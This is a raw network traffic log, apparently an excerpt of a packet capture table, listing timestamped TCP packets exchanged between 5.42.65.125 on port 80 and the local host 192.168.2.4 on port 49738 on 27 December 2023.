Dec 27, 2023 18:12:25.028388023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028408051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.028453112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028470039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028481007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028492928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.028492928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.028515100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.030211926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030297041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030309916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030319929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030332088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030345917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.030347109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030359030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030371904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030378103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.030384064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030395985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.030400038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.030424118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032413960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032426119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032437086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032461882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032489061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032495975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032548904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032566071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032578945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032583952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032591105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032612085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032613039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032625914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032644033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032919884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032932043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032960892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.032962084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.032994986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.033016920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033029079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033051014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033062935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033086061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.033112049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033112049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.033123970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033135891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033158064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.033916950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033930063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.033951044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.033976078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034008026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.034373999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034385920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034396887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034408092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034425974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.034444094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.034460068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034471989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034482956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034518003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.034576893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.034938097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034950972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034962893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034975052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.034991026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.035011053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.035094976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035106897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035118103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035128117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.035130024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035142899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035155058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035156012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.035175085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.035885096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035897970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.035917044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.035989046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036000967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036011934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036022902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.036047935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.036057949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036073923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036086082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036097050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036108971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036117077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.036144972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.036777973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036803007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036809921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.036815882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036875963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.036894083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036906958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036922932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036936045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.036942005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.037053108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037065029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037076950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037086964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.037115097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.037789106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037821054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.037904978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037919998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037930965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037942886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037959099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.037983894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.037992954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.037996054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038008928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038024902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038027048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.038038015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038055897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.038731098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038743973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038755894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038768053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.038784027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.038793087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038805008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038816929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038830042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038839102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.038872957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.038908958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038922071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038933992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.038954020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.039756060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039767981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039783955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039792061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.039818048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.039827108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039839983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039875984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039887905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039906979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.039932966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039933920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.039946079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039958000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.039978027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.040766001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040777922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040795088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040800095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.040807009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040818930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040829897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040842056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.040843010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040860891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040868044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.040873051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040884972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.040884972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.040910006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.041620970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041634083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041654110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.041719913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041733027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041743994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041752100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.041757107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041779041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.041927099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041939974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041958094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.041970015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.041982889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042001009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.042669058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042680979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042694092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042704105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.042727947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.042753935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042766094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042777061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042788029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042800903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042802095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.042813063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042819977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.042824984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.042838097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.043634892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043648005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043669939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.043679953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043692112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043709993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.043745041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043757915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043768883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043788910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.043792963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043807030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043818951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.043823004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.043859005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046134949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046148062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046159029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046169043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046180010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046195030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046205044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046227932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046258926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046289921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046302080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046314001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046322107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046324968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046349049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046622038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046634912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046646118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046658039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046658039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046675920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046801090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046813965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046825886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046838045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046848059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046849966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046863079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.046873093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.046889067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.047662020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047673941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047686100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047697067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047714949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.047739029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047751904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047763109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047779083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.047785044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047804117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.047828913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047841072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.047861099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.048727036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048738956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048783064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.048804045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048816919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048826933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048837900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048849106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048858881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048866034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.048873901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048882961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.048886061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.048912048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.049539089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049551964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049576998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.049582005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049613953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.049633026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049643993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049658060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049689054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.049694061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049705982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049716949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049729109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.049734116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.049755096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.050532103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050544024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050554991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050565004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050571918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.050576925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050589085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.050610065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050616980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.050621986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050633907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050645113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050654888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.050657034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.050677061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.051402092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051414013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051425934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051445961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.051470995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051476002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.051528931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051541090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051553011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051562071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.051563025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051579952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051589012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.051592112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.051620007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.052474022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052484989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052495956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052505970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052516937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052524090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.052527905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052541018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052546024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.052551985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052552938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.052563906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052576065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.052576065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.052598000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.053350925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053363085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053375006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.053402901 CET	49738	80	192.168.2.4	5.42.65.125
